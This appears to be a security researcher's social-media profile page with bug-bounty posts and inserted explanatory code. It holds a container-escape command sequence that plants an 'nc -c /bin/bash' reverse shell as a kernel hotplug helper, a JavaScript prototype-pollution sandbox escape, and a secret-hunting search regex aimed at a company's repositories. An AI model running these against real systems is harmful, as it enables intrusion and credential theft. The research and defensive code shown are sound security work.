Bipin Jitiya (@win3zz)
337 posts

Founder of @Cuberks. Maker, hacker, security researcher. Love nature and psithurism. Tweets mostly about hacking, tech, entrepreneurship, and other geeky stuff.

Ahmadabad City, India. Joined January 2014
146 Following, 7.8K Followers

Pinned Tweet
Bipin Jitiya (@win3zz):
As I previously promised, I would publish a writeup on how I managed to find the SSRF bug on the biggest social media website, Facebook. So I wrote a blog about that finding. I hope you like it. 🍷 #BugBounty #Infosec link.medium.com/smZtjTvTV6
Bipin Jitiya (@win3zz):
CVE-2026-28353: Trivy VSCode ext v1.8.12 pwned. GitHub Actions misconfig → PAT stolen → attacker pushed malicious build to OpenVSX. Payload scrapes env secrets, creds, API keys & code via local AI agents → exfil to C2. CVSS 10.0 crit. Uninstall ASAP, rotate all keys.
[image]
Bipin Jitiya (@win3zz):
Sandbox bypass → arbitrary code exec → OS cmd exec in GenAI dev platform. Found js.map, used SourceMapper to extract JS, analysed logic, used prototype pollution + object traversal to bypass. Got creds incl private keys, cloud, GitHub, DB, mail, other secrets.
[image]
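An added illustration of the bypass class this post names, written for this page; it is not the author's code and not the platform's (that code is not on the page, so the `mergeOptions`/`insecureEval` design, the inheritable `allowGlobals` flag and the sample formulas are assumed stand-ins). The first half chains the two primitives the post lists: a JSON config merge that honours `__proto__` keys pollutes `Object.prototype`, which flips a trust flag the sandbox reads by plain property lookup; with the denylist off, `(1).constructor.constructor("return this")()` walks from a number literal to the real global object. The second half is the hardened form: a merge that refuses prototype keys, and an allow-list token grammar in place of a denylist, so no formula can reach a constructor or `this`.

```javascript
'use strict';
// Added example, not the platform's or the author's code. Assumed stand-ins:
// mergeOptions/insecureEval (the escapable design), the inheritable
// allowGlobals flag, and the sample formulas.

// --- Vulnerable half -------------------------------------------------------

// Recursive merge of user-supplied JSON into defaults. Copying a "__proto__"
// key walks into Object.prototype: a prototype-pollution sink.
function mergeOptions(target, source) {
  for (const key of Object.keys(source)) {
    const v = source[key];
    if (typeof v === 'object' && v !== null) {
      if (typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      mergeOptions(target[key], v); // target["__proto__"] === Object.prototype
    } else {
      target[key] = v;
    }
  }
  return target;
}

// Denylist filter, skipped when opts.allowGlobals is true. The flag is read by
// plain property lookup, so an inherited (polluted) value counts.
const DENY = /process|require|import|constructor/;

function insecureEval(formula, userOptions) {
  const opts = mergeOptions({ precision: 2 }, userOptions);
  if (opts.allowGlobals !== true && DENY.test(formula)) {
    throw new Error('blocked by denylist');
  }
  const ctx = { price: 19.99, sum: (...xs) => xs.reduce((a, b) => a + b, 0) };
  // `with` + Function constructor: the classic escapable "sandbox".
  return new Function('ctx', 'with (ctx) { return (' + formula + '); }')(ctx);
}

// Attacker input (constructed), e.g. a saved widget config plus a "formula".
const POLLUTION = JSON.parse('{"__proto__": {"allowGlobals": true}}');
// Object traversal: number literal -> Number -> Function -> real globalThis.
const TRAVERSAL = '(1).constructor.constructor("return this")().process.pid';

function demoInsecureEscape() {
  try {
    return insecureEval(TRAVERSAL, POLLUTION); // the host process's pid
  } finally {
    delete Object.prototype.allowGlobals;      // clean up for the rest of the file
  }
}

// --- Hardened half ---------------------------------------------------------

// Merge that never writes through __proto__/constructor/prototype and keeps
// nested containers prototype-free.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue;
    const v = source[key];
    if (typeof v === 'object' && v !== null) {
      if (!Object.prototype.hasOwnProperty.call(target, key) ||
          typeof target[key] !== 'object' || target[key] === null) {
        target[key] = Object.create(null);
      }
      safeMerge(target[key], v);
    } else {
      target[key] = v;
    }
  }
  return target;
}

// Allow-list grammar instead of a denylist: numbers, allow-listed identifiers,
// arithmetic operators, parentheses, commas. No strings, brackets or dots, so
// there is no path from any value to its constructor, and no `this`.
const TOKEN = /^(?:\s+|\d+(?:\.\d+)?|[A-Za-z_]\w*|[-+*\/(),])/;

function safeEval(formula, helpers) {
  const names = Object.keys(helpers);
  const allowed = new Set(names);
  let rest = formula;
  while (rest.length > 0) {
    const m = TOKEN.exec(rest);
    if (!m) throw new Error('illegal token near: ' + rest.slice(0, 10));
    if (/^[A-Za-z_]/.test(m[0]) && !allowed.has(m[0])) {
      throw new Error('unknown identifier: ' + m[0]);
    }
    rest = rest.slice(m[0].length);
  }
  // Helpers arrive as parameters (no `with`, no inherited lookups); strict mode
  // makes `this` undefined inside the generated function.
  const fn = new Function(...names, '"use strict"; return (' + formula + ');');
  return fn(...names.map((n) => helpers[n]));
}

const HELPERS = { price: 19.99, sum: (...xs) => xs.reduce((a, b) => a + b, 0) };

function demoHardened() {
  const opts = safeMerge({ precision: 2 }, POLLUTION); // __proto__ key dropped
  return {
    polluted: ({}).allowGlobals === true,
    opts,
    total: safeEval('sum(price, 1) * 2', HELPERS),      // 41.98
  };
}
```

The hardened evaluator still uses `Function`, which is deliberate: the lesson is that the boundary is the grammar and the lookup model, not a list of forbidden words. A production system should replace the generated function with a small interpreter over the parsed tokens, which removes the JavaScript engine from the trust boundary entirely.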
Bipin Jitiya (@win3zz):
Remember this post? I am working on a detailed write-up for it. My last write-up (Google Cloud Shell Container Escape) got an amazing response, so I decided to work on another detailed one. I will publish it tomorrow at 10:30 AM (IST).
Quoted tweet: the sandbox bypass post above (@win3zz).
Bipin Jitiya (@win3zz):
As I promised, here is my writeup. RCE via Insecure JS Sandbox Bypass: medium.com/@win3zz/rce-via-insecure-js-sandbox-bypass-a26ad6364112
[image]
Bipin Jitiya (@win3zz):
@yangO760305 Do you see any error while running: ip link add xyz type dummy OR ip link add xyz type tun?
yang O (@yangO760305):
@win3zz How do I use hotplug to escape containers? I can't reproduce it locally.
Bipin Jitiya (@win3zz):
New writeup! Google Cloud Shell Container Escape: medium.com/@win3zz/google-cloud-shell-container-escape-b69ffb46b5df
Bipin Jitiya (@win3zz):
medium.com/@win3zz/google-cloud-shell-container-escape-b69ffb46b5df
Bipin Jitiya (@win3zz):
# 1. Drop a reverse-shell script in the container rootfs; it connects back to this container's IP on port 9001
echo $'#!/bin/sh\nnc -c /bin/bash '$(hostname -I|awk '{print $1}')' 9001' | sudo tee /shell > /dev/null && sudo chmod +x /shell
# 2. Register the host-side (overlay upperdir) path of that script as the kernel's hotplug helper
echo "$(mount|grep upper|sed -E 's/.*upperdir=([^,]+).*/\1/')/shell" | sudo tee /proc/sys/kernel/hotplug > /dev/null
# 3. Raise a uevent; the kernel runs the helper outside the container
sudo ip link add test0 type dummy
Bipin Jitiya (@win3zz):
Every end is a new beginning
[image]
Bipin Jitiya (@win3zz):
Two words: keep going.
Bipin Jitiya (@win3zz):
Scan Git orgs 4 secrets: /(?i)(password|passwd|pwd|secret|token|apikey|api_key|access_key|secret_key|access_token|api_secret|apiSecret|app_secret|application_key|app_key|appkey|auth_token|authsecret)\s*=\s*["'][^"']{4,}["']/ AND org:adobe AND NOT language:Markdown NOT is:archived
[image]
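An added local counterpart to the search query above, written for this page and not the author's tooling: the same key-name pattern run over file contents, with the two filters a triager applies before reading hundreds of hits (a placeholder list and a Shannon-entropy threshold), and the query's Markdown exclusion reproduced as a path filter. The sample files, the placeholder list and the 3.0-bit threshold are constructed/assumed; JavaScript regexes take the `i` flag in place of the query's inline `(?i)`.

```javascript
'use strict';
// Added example, not the author's tooling. Sample files, the placeholder
// list and the entropy threshold are constructed/assumed.

// The key names from the search query; JS regexes take the 'i' flag instead
// of an inline (?i). Group 1 = key, group 2 = quoted value (4+ chars).
const ASSIGNMENT = /(password|passwd|pwd|secret|token|apikey|api_key|access_key|secret_key|access_token|api_secret|apiSecret|app_secret|application_key|app_key|appkey|auth_token|authsecret)\s*=\s*["']([^"']{4,})["']/i;

// Values that are documentation or templating, not credentials (assumed list).
const PLACEHOLDER = /^(?:changeme|password|secret|x{3,}|\*+|<[^>]*>|\$\{[^}]*\}|your[\w-]*|example[\w-]*|dummy[\w-]*|none|null)$/i;

// Mirrors "NOT language:Markdown" from the query.
function shouldScan(path) {
  return !/\.(?:md|markdown)$/i.test(path);
}

// Shannon entropy in bits per character; random tokens score well above 3.
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Never echo a candidate secret in full into a report.
function mask(v) {
  return v.length <= 8 ? '*'.repeat(v.length) : v.slice(0, 4) + '...' + v.slice(-2);
}

// Scan one file's text. Every regex hit is reported, but with a verdict so the
// reviewer reads likely-secret rows first.
function scanText(path, text, { minEntropy = 3.0 } = {}) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, i) => {
    const m = ASSIGNMENT.exec(line);
    if (!m) return;
    const [, key, value] = m;
    const entropy = shannonEntropy(value);
    const verdict = PLACEHOLDER.test(value) ? 'placeholder'
      : entropy < minEntropy ? 'low-entropy'
      : 'likely-secret';
    findings.push({ path, line: i + 1, key, value: mask(value), entropy: +entropy.toFixed(2), verdict });
  });
  return findings;
}

// files: { path -> contents }, e.g. the checkout of each repo in the org.
function scanFiles(files, opts) {
  return Object.entries(files)
    .filter(([path]) => shouldScan(path))
    .flatMap(([path, text]) => scanText(path, text, opts));
}

// Constructed sample files standing in for an org's repositories.
const SAMPLES = {
  'config/settings.py': [
    'DEBUG = True',
    'SECRET_KEY = "django-insecure-r8f2k1q9x7zv4m0nbd6ay3cw"',
    'PASSWORD = "changeme"',
  ].join('\n'),
  'deploy/env.sh': [
    'export AWS_ACCESS_KEY="AKIAQ2X7M4ZPL9WEB3VT"',
    "export API_SECRET='${VAULT_API_SECRET}'",
    "export db_password='aaaaaaaaaaaa'",
  ].join('\n'),
  'README.md': 'Set `api_key = "your-api-key-here"` in the config.',
};

if (typeof require !== 'undefined' && require.main === module) {
  console.table(scanFiles(SAMPLES));
}
```

On the samples this yields five findings from two files (README.md is skipped): two `likely-secret`, two `placeholder`, one `low-entropy`. The entropy threshold is a triage aid, not a verdict: a short, dictionary-word password scores low and is still a real credential, so low-entropy rows are deprioritised rather than dropped.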
Bipin Jitiya (@win3zz):
@retweet_Winn It needs human reasoning, context, and logic to understand how models interpret language, policies, and intent.
Bipin Jitiya (@win3zz):
Prompt injection, chaining for multi-stage exfiltration, SSRF, Auth Token Leak, AI Chatbot Testing
[image] [image]